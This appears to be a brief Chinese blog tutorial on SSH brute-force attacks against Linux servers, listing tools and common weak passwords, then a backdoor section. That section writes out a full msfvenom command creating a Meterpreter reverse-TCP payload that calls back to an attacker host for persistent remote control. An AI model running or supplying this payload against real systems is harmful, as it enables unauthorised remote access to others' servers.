SSH暴力破解

Linux是开源系统,系统本身因漏洞造成的攻击相对比较少,主要集中在SSH攻击;

SSH所采用的加密机制,可以防止数据传输过程中信息泄露;

SSH基于用户名密码的身份验证,容易遭受密码暴力破解攻击;

SSH暴力破解工具
 Hydra、Medusa、msf


大部分攻击都是针对Linux服务器默认管理账号root,攻击者主要使用admin、root、123456等常见弱密码进行暴力破解

少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名

攻击者不仅使用常见通用弱密码,还会将用户名当作密码进行攻击

对称加密

        加密和解密速度快,效率高

SSH暴力破解_第1张图片

LINUX后门 

侵入成功后,为了持久远程控制对方,即便是对方已经进行安全加固

1.创建后门程序(在kali第一个终端中执行)

# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell,反弹到192.168.10.224的4444端口

-o 指定创建的后门程序

-lhost 反弹的主机:本机IP地址

-lport 反弹的端口:本地端口号

你可能感兴趣的:(ssh,安全,运维)